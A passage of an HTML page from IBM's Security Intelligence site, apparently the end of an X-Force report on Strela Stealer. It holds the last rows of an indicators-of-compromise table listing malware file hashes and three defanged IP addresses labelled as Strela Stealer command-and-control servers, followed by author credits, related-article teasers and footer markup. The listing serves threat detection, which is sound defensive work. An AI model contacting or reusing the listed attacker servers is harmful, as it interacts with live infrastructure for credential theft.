font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader – minimal obfuscation (Jan 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">9a032497b82c3db8146cb624b369f63bef76b302a5e25349156bdcb53af3fb84</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e4a7ad38aaea4bd27c32c57b5a52eac1020495cf8698a2b595b169a3c5c9313a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2f7ac330e100b577748bb34bd8f7f655f6d138b90683594dbf06ccc41bb3751a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Nov 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">94.159.113[.]48</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">94.159.113[.]86</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">193.109.85[.]231</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">5906c8e683b8eb9d2bc104f3ca7abaa1f76c64ac694c46a0de5ec67456364f5d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer .NET variant</p> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> </body></html> <div id="nc_pixel"></div><div class="post__tags"> <a href="https://securityintelligence.com/tag/europe/" rel="tag">Europe</a><span> | </span><a href="https://securityintelligence.com/tag/malware/" rel="tag">Malware</a><span> | </span><a href="https://securityintelligence.com/tag/phishing/" rel="tag">Phishing</a><span> | </span><a href="https://securityintelligence.com/tag/ransomware/" rel="tag">Ransomware</a><span> | </span><a href="https://securityintelligence.com/tag/x-force/" rel="tag">X-Force</a></div> <div class="post__author author co-authors "> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2021/06/Golo-Mühr-Headshot.png);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/golo-muhr/" >Golo Mühr</a></div> <div class="author__role">X-Force Threat Intelligence, IBM</div> </div> </div> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2023/10/IMG_6039-scaled.jpg);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/joe-fasulo/">Joe Fasulo</a></div> <div class="author__role">Cyber Threat Researcher - IBM X-Force</div> </div> </div> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/themes/sapphire/images/default-pic.jpg);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/charlotte-hammond/">Charlotte Hammond</a></div> <div class="author__role">Malware Reverse Engineer, IBM Security</div> </div> </div> </div> <!-- CONTINUE READING --> <style type="text/css"> .post__content--continue_reading{ max-height: 725px; overflow:hidden; transition: max-height cubic-bezier(0.9, 0, 1, 1) 2s; } @media (max-width: 768px) { .post__content--continue_reading{ max-height: 1225px; } } </style> <div class="continue_reading_wrapper" id="continue_reading"> <button on="tap: post__content.toggleClass(class=post__content--continue_reading), continue_reading.toggleClass(class=continue_reading_wrapper--clicked)" tabindex="0" role="button">Continue Reading</button> </div> </main> </div> </div> <aside class="grid__sidebar post__sidebar "> <div class="mobile_divider"></div> <header class="post__sidebar__header">POPULAR</header> <!-- ARTICLES --> <article class="article article_grid article__mobile--card"> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/what-telegrams-recent-policy-shift-means-for-cyber-crime/" aria-label="What Telegram’s recent policy shift means for cyber crime"> <div class="article__img"> <amp-img alt="" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/A-dark-mystery-hand-typing-on-a-laptop-computer-at-night-630x330.jpeg.webp"> <amp-img fallback alt="" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/A-dark-mystery-hand-typing-on-a-laptop-computer-at-night-630x330.jpeg"> </amp-img> </amp-img> </div> </a> <!-- TXT --> <div class="article__text_container" style="-webkit-box-orient: vertical;"> <!-- CAT --> <a class="article__category_link" href="https://securityintelligence.com/category/topics/risk-management/" aria-label="https://securityintelligence.com/category/topics/risk-management/"> Risk Management </a> <!-- DATE --> <span class="article__date"> November 6, 2024 </span> <!-- TITLE & EXCERPT --> <a href="https://securityintelligence.com/articles/what-telegrams-recent-policy-shift-means-for-cyber-crime/" class="article__content_link" aria-label="What Telegram’s recent policy shift means for cyber crime"> <h2 class="article__title">What Telegram’s recent policy shift means for cyber crime</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Since its launch in August 2013, Telegram has become the go-to messaging app for privacy-focused users. To start using the app, users can sign up using either their real phone number or an anonymous number purchased from the Fragment blockchain… </p> </a> </div> </article> <article class="article article_grid article__mobile--card"> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/" aria-label="Cybersecurity dominates concerns among the C-suite, small businesses and the nation"> <div class="article__img"> <amp-img alt="A young man & woman working behind the counter in a music store" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Young-couple-working-behind-counter-in-music-store-630x330.jpeg.webp"> <amp-img fallback alt="A young man & woman working behind the counter in a music store" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Young-couple-working-behind-counter-in-music-store-630x330.jpeg"> </amp-img> </amp-img> </div> </a> <!-- TXT --> <div class="article__text_container" style="-webkit-box-orient: vertical;"> <!-- CAT --> <a class="article__category_link" href="https://securityintelligence.com/category/topics/risk-management/" aria-label="https://securityintelligence.com/category/topics/risk-management/"> Risk Management </a> <!-- DATE --> <span class="article__date"> November 15, 2024 </span> <!-- TITLE & EXCERPT --> <a href="https://securityintelligence.com/articles/cybersecurity-dominates-concerns-c-suite-small-businesses-nation/" class="article__content_link" aria-label="Cybersecurity dominates concerns among the C-suite, small businesses and the nation"> <h2 class="article__title">Cybersecurity dominates concerns among the C-suite, small businesses and the nation</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Once relegated to the fringes of business operations, cybersecurity has evolved into a front-and-center concern for organizations worldwide. What was once considered a technical issue managed by IT departments has become a boardroom topic of utmost importance. With the rise… </p> </a> </div> </article> <article class="article article_grid article__mobile--card"> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/posts/6-principles-operational-technology-cybersecurity-nsa-initiative/" aria-label="6 Principles of Operational Technology Cybersecurity released by joint NSA initiative"> <div class="article__img"> <amp-img alt="A man & woman talking & standing in front of a wall of monitors displaying graphics" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Tutor-and-student-in-front-of-monitors-in-ships-engine-room-simulator-630x330.jpeg.webp"> <amp-img fallback alt="A man & woman talking & standing in front of a wall of monitors displaying graphics" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Tutor-and-student-in-front-of-monitors-in-ships-engine-room-simulator-630x330.jpeg"> </amp-img> </amp-img> </div> </a> <!-- TXT --> <div class="article__text_container" style="-webkit-box-orient: vertical;"> <!-- CAT --> <a class="article__category_link" href="https://securityintelligence.com/category/topics/risk-management/" aria-label="https://securityintelligence.com/category/topics/risk-management/"> Risk Management </a> <!-- DATE --> <span class="article__date"> November 12, 2024 </span> <!-- TITLE & EXCERPT --> <a href="https://securityintelligence.com/posts/6-principles-operational-technology-cybersecurity-nsa-initiative/" class="article__content_link" aria-label="6 Principles of Operational Technology Cybersecurity released by joint NSA initiative"> <h2 class="article__title">6 Principles of Operational Technology Cybersecurity released by joint NSA initiative</h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 4</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Today’s critical infrastructure organizations rely on operational technology (OT) to help control and manage the systems and processes required to keep critical services to the public running. However, due to the highly integrated nature of OT deployments, cybersecurity has become… </p> </a> </div> </article> <!-- ADVERTISEMENT --> <div class="billboard_wrapper"> <a href="https://www.ibm.com/reports/data-breach?utm_medium=OSocial&utm_source=Blog&utm_content=RSRWW&utm_id=si-blog-right-rail " aria-label="A SPONSORED flag "> <amp-img layout='responsive' widht='300' height='250' src="https://securityintelligence.com/wp-content/uploads/2024/07/SIB_CODB_rightrail_banners2024-think_600x1200.png" alt="CODB right rail banner with red, blue, & purple lines in a wide circular pattern"> </amp-img> </a> </div> </aside> </div> <script> const kaltura = document.querySelectorAll("[data-widget=\"videoplayer\"]") if (kaltura != null) { kaltura.forEach(function(item){ const kId = item.id + '--' + item.dataset.videoid; document.getElementById(item.id).id = kId; getKalturaVideo(item); }) } </script> <div class="card_container_background "> <section class="container cards"> <h3>More from Threat Intelligence</h3> <div class="cards__wrapper"> <article class="article article--card cards__article_grid "> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/hive0147-serving-juicy-picanha-with-side-of-mekotio/"> <div class="article__img"> <amp-img alt="Closeup on a laptop screen displaying green code in a dimly red-lit room" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/10/Closeup-on-modern-female-with-laptop-writing-code-630x330.jpeg.webp"> <amp-img fallback alt="Closeup on a laptop screen displaying green code in a dimly red-lit room" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/10/Closeup-on-modern-female-with-laptop-writing-code-630x330.jpeg"> </amp-img> </amp-img> </div> </a> <!-- TXT --> <div class="article__text_container" style="-webkit-box-orient: vertical;"> <!-- CAT AND DATE --> <div class="article__eyebrow"> <span class="article__date"> October 16, 2024 </span> </div> <!-- TITLE & EXCERPT --> <a href="https://securityintelligence.com/x-force/hive0147-serving-juicy-picanha-with-side-of-mekotio/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> Hive0147 serving juicy Picanha with a side of Mekotio </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 17</span> <span class="rt-label rt-postfix">min read</span></span> - </span>IBM X-Force tracks multiple threat actors operating within the flourishing Latin American (LATAM) threat landscape. X-Force has observed Hive0147 to be one of the most active threat groups operating in the region, targeting employee inboxes at scale, with a primary focus on phishing and malware distribution. After a 3-month break, Hive0147 returned in July with even larger campaign volumes, and the debut of a new malicious downloader X-Force named "Picanha,” likely under continued development, deploying the Mekotio banking trojan. Hive0147… </p> </div> </a> </div> </article> <article class="article article--card cards__article_grid "> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/news/fysa-critical-rce-flaw-in-gnu-linux-systems/"> <div class="article__img"> <amp-img alt="Closeup on a red computer screen displaying code covered by a large ALERT message" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/07/computer-security-630x330.jpeg.webp"> <amp-img fallback alt="Closeup on a red computer screen displaying code covered by a large ALERT message" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/07/computer-security-630x330.jpeg"> </amp-img> </amp-img> </div> </a> <!-- TXT --> <div class="article__text_container" style="-webkit-box-orient: vertical;"> <!-- CAT AND DATE --> <div class="article__eyebrow"> <span class="article__date"> September 26, 2024 </span> </div> <!-- TITLE & EXCERPT --> <a href="https://securityintelligence.com/news/fysa-critical-rce-flaw-in-gnu-linux-systems/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> FYSA – Critical RCE Flaw in GNU-Linux Systems </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 2</span> <span class="rt-label rt-postfix">min read</span></span> - </span>Summary The first of a series of blog posts has been published detailing a vulnerability in the Common Unix Printing System (CUPS), which purportedly allows attackers to gain remote access to UNIX-based systems. The vulnerability, which affects various UNIX-based operating systems, can be exploited by sending a specially crafted HTTP request to the CUPS service. Threat Topography Threat Type: Remote code execution vulnerability in CUPS service Industries Impacted: UNIX-based systems across various industries, including but not limited to, finance, healthcare,… </p> </div> </a> </div> </article> <article class="article article--card cards__article_grid "> <!-- IMG --> <a class="exclusive_article__category_link" href="https://securityintelligence.com/x-force/hive0137-on-ai-journey/"> <div class="article__img"> <amp-img alt="Closeup on a pair of silver metallic robot hands typing on a keyboard" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/07/Ai-working-with-keyboard-630x330.jpeg.webp"> <amp-img fallback alt="Closeup on a pair of silver metallic robot hands typing on a keyboard" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/07/Ai-working-with-keyboard-630x330.jpeg"> </amp-img> </amp-img> </div> </a> <!-- TXT --> <div class="article__text_container" style="-webkit-box-orient: vertical;"> <!-- CAT AND DATE --> <div class="article__eyebrow"> <span class="article__date"> July 26, 2024 </span> </div> <!-- TITLE & EXCERPT --> <a href="https://securityintelligence.com/x-force/hive0137-on-ai-journey/" class="article__content_link"> <div class="article__direction"> <h2 class="article__title"> Hive0137 and AI-supplemented malware distribution </h2> <p class="article__excerpt" style="-webkit-box-orient: vertical;"> <span class="article__read_time"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 12</span> <span class="rt-label rt-postfix">min read</span></span> - </span>IBM X-Force tracks dozens of threat actor groups. One group in particular, tracked by X-Force as Hive0137, has been a highly active malware distributor since at least October 2023. Nominated by X-Force as having the “Most Complex Infection Chain” in a campaign in 2023, Hive0137 campaigns deliver DarkGate, NetSupport, T34-Loader and Pikabot malware payloads, some of which are likely used for initial access in ransomware attacks. The crypters used in the infection chains also suggest a close relationship with former… </p> </div> </a> </div> </article> </div> </section> </div> <!--SI Newsletters --> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.31.0-rc.0/cta-section.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/cta-section.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/cta-section.min.js"></script> <div style="background-color: #161616;"> <dds-cta-section data-autoid="dds--cta-section" children-custom-class="" class="container SI_padding"> <dds-cta-block no-border="" data-autoid="dds--cta-block"> <dds-content-block-heading class="copy" role="heading" aria-level="2" data-autoid="dds--content-block__heading" slot="heading"> <h2 >Topic updates</h2> </dds-content-block-heading> <dds-content-block-copy data-autoid="dds--content-block__copy" size="md" slot="copy"> <dds-content-block-paragraph data-autoid="dds--content-block-paragraph" class="copy"> Get email updates and stay ahead of the latest threats to the security landscape, thought leadership and research. </dds-content-block-paragraph> <div role="list" class="list_newletter"> <dds-button-cta data-autoid="dds-cta" cta-style="button" class="copy" cta-type="local" href="https://www.ibm.com/account/reg/us-en/signup?formid=news-urx-51966" kind="primary" icon-layout="" size=""> Subscribe today </dds-button-cta> </div> </dds-content-block-copy> </dds-cta-block> </dds-cta-section> </div> <dds-footer-container></dds-footer-container> <script> document.addEventListener('DOMContentLoaded', () => { const boxstyle = document.querySelector('.button2'); const removePadding = document.querySelector('dds-cta-section'); if (boxstyle) { const shadowRoot = boxstyle.shadowRoot; const bxContentSsectionDOM = shadowRoot.querySelector('.bx--btn'); if (bxContentSsectionDOM) { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.addEventListener('mouseover', () => { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.style.backgroundColor = 'rgba(141, 141, 141, 0.16)'; // }); // when mouse leave the element bxContentSsectionDOM.addEventListener('mouseout', () => { bxContentSsectionDOM.style.color = 'white'; bxContentSsectionDOM.style.borderColor = 'white'; bxContentSsectionDOM.style.backgroundColor = 'transparent'; // Reset background color }); } } if(removePadding){ const shadowRoot = removePadding.shadowRoot; const removespace = shadowRoot.querySelector('.bx--content-section__leading'); if(removespace){ removespace.style.display = 'none'; } } }); document.querySelector("dds-footer-container").size = 'default'; //Uncomment this to add a custom links. // document.querySelector("dds-footer-container").adjunctLinks = [{ // 'title': 'IBM Custom Link', // 'link': 'https://ibm.com' // }, // { // 'title': 'IBM Custom Link2', // 'link': 'https://ibm.com' // } // ]; </script> <!--SI close Newsletters--> <div style="background-color: #13171a;"> <div class="container"> <!-- FOOTER --> <section id="footer" class="footer"> <!-- LOGO --> <div class="footer__logo"> <amp-img width="280" height="31" layout="responsive" src="https://securityintelligence.com/wp-content/themes/sapphire/images/logo-white.svg" alt="Security Intelligence"></amp-img> </div> <!-- COPY --> <div class="footer__copy"><p>Analysis and insights from hundreds of the brightest minds in the cybersecurity industry to help you prove compliance, grow business and stop threats.</p> </div> <!-- LINKS --> <div class="footer__list"> <a href="/news/" class="footer__link">Cybersecurity News</a> <a href="/category/topics/" class="footer__link">By Topic</a> <a href="/category/industries/" class="footer__link">By Industry</a> <a href="/series/" class="footer__link">Exclusive Series</a> <a href="/x-force/" class="footer__link">X-Force</a> <a href="/media/" class="footer__link">Podcast</a> <a href="/events/" class="footer__link">Events</a> <a href="/about-us/" class="footer__link">Contact</a> <a href="/about-us/" class="footer__link">About Us</a> </div> <!-- SOCIAL NETWORKS --> <div class="footer__social-networks"> <div class="headline">Follow us on social</div> <a href="http://www.twitter.com/ibmsecurity" aria-label="Twitter" class="footer__icon" style="left:-4px;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M24 4.557c-.883.392-1.832.656-2.828.775 1.017-.609 1.798-1.574 2.165-2.724-.951.564-2.005.974-3.127 1.195-.897-.957-2.178-1.555-3.594-1.555-3.179 0-5.515 2.966-4.797 6.045-4.091-.205-7.719-2.165-10.148-5.144-1.29 2.213-.669 5.108 1.523 6.574-.806-.026-1.566-.247-2.229-.616-.054 2.281 1.581 4.415 3.949 4.89-.693.188-1.452.232-2.224.084.626 1.956 2.444 3.379 4.6 3.419-2.07 1.623-4.678 2.348-7.29 2.04 2.179 1.397 4.768 2.212 7.548 2.212 9.142 0 14.307-7.721 13.995-14.646.962-.695 1.797-1.562 2.457-2.549z" /> </svg> </a> <a href="http://www.linkedin.com/company/ibm-security" aria-label="LinkedIn" class="footer__icon" style="justify-self: center;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M4.98 3.5c0 1.381-1.11 2.5-2.48 2.5s-2.48-1.119-2.48-2.5c0-1.38 1.11-2.5 2.48-2.5s2.48 1.12 2.48 2.5zm.02 4.5h-5v16h5v-16zm7.982 0h-4.968v16h4.969v-8.399c0-4.67 6.029-5.052 6.029 0v8.399h4.988v-10.131c0-7.88-8.922-7.593-11.018-3.714v-2.155z" /> </svg> </a> <a href="https://www.youtube.com/@IBMTechnology" aria-label="YouTube" class="footer__icon" style="justify-self: end;"> <svg xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28" fill="#FFFFFF"> <path d="M19.615 3.184c-3.604-.246-11.631-.245-15.23 0-3.897.266-4.356 2.62-4.385 8.816.029 6.185.484 8.549 4.385 8.816 3.6.245 11.626.246 15.23 0 3.897-.266 4.356-2.62 4.385-8.816-.029-6.185-.484-8.549-4.385-8.816zm-10.615 12.816v-8l8 3.993-8 4.007z" /> </svg> </a> </div> </section> </div> </div> <div style="background-color:black"> <div class="container"> <!-- UTILITIES BAR --> <section class="utility_bar"> <!-- LINKS --> <div class="utility_bar__links" aria-label="Footer Navigation"> <a href="http://www.ibm.com?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">© 2024 IBM</a> <a href="https://www.ibm.com/contact/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Contact</a> <a href="https://www.ibm.com/privacy/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Privacy</a> <a href="https://www.ibm.com/legal/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US&cm_mc_uid=03001744655915532865554&cm_mc_sid_50200000=84159441565120380187" target="_blank" rel="noopener, noreferrer">Terms of use</a> <a href="https://www.ibm.com/accessibility/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Accessibility</a> <a href="#" onclick="truste.eu.clickListener();return false;" target="_blank" rel="noopener, noreferrer">Cookie Preferences</a> </div> <!-- Sponsor credits --> <div class="utility_bar__sponsor"> <a href="http://ibm.com/security?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" data-icon="B" class="icon ibm" rel="noopener, noreferrer" style="padding-right:0px"> <span>Sponsored by <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 31.97 14.06"> <defs> <style> .cls-1 { fill: #fff; } </style> </defs> <title>si-icon-eightbarfeature</title> <path class="cls-1" d="M27.17,12.6h4.21v.84H27.17Zm0-1.68h4.21v.84H27.17Zm0-1.68h2.52v.84H27.17Zm0-1.69h2.52V8.4H27.17Zm0-1.68h2.52v.84H27.17Zm-.84-4.2.28-.85h4.77v.85Zm-.56,1.68.29-.84h5.32v.84ZM25.22,5l.28-.84h4.19V5Zm-.56,1.68L25,5.87h2.22l-.27.84Zm0,6.73-.28-.84H25Zm-.55-1.68-.29-.84H25.5l-.28.84Zm-.56-1.68-.27-.84H26l-.27.84ZM23,8.4l-.29-.85h3.9l-.28.85Zm-.57-1.69-.27-.84h2.22l.28.84Zm-2.8,2.53h2.53v.84H19.63Zm0-1.69h2.53V8.4H19.63Zm0-1.68h2.53v.84H19.63Zm0-.84V4.19h4.19l.29.84ZM18,12.6h4.21v.84H18Zm0-1.68h4.21v.84H18Zm0-7.57V2.51h5.32l.28.84Zm0-1.68V.82h4.76l.29.85ZM14.16,9.24H17a2.23,2.23,0,0,1,.07.37,2.49,2.49,0,0,1,0,.47H14.16Zm0-5h2.95a2.38,2.38,0,0,1,0,.46A2.18,2.18,0,0,1,17,5H14.16ZM9.11,9.24h2.52v.84H9.11Zm0-1.69H16a5,5,0,0,1,.4.4,2,2,0,0,1,.32.45H9.11Zm0-1.68h7.57a2,2,0,0,1-.32.45,4.89,4.89,0,0,1-.4.39H9.11Zm0-1.68h2.52V5H9.11ZM7.42,12.6H16a3.09,3.09,0,0,1-1,.62,3.73,3.73,0,0,1-1.32.22H7.42Zm0-1.68H17a2.47,2.47,0,0,1-.15.46,2.24,2.24,0,0,1-.21.38H7.42Zm0-8.41h9.22a1.91,1.91,0,0,1,.21.38,2.47,2.47,0,0,1,.15.46H7.42Zm0-1.69H13.6a3.73,3.73,0,0,1,1.32.23,3.09,3.09,0,0,1,1,.62H7.42Zm-5,8.42H4.9v.84H2.38Zm0-1.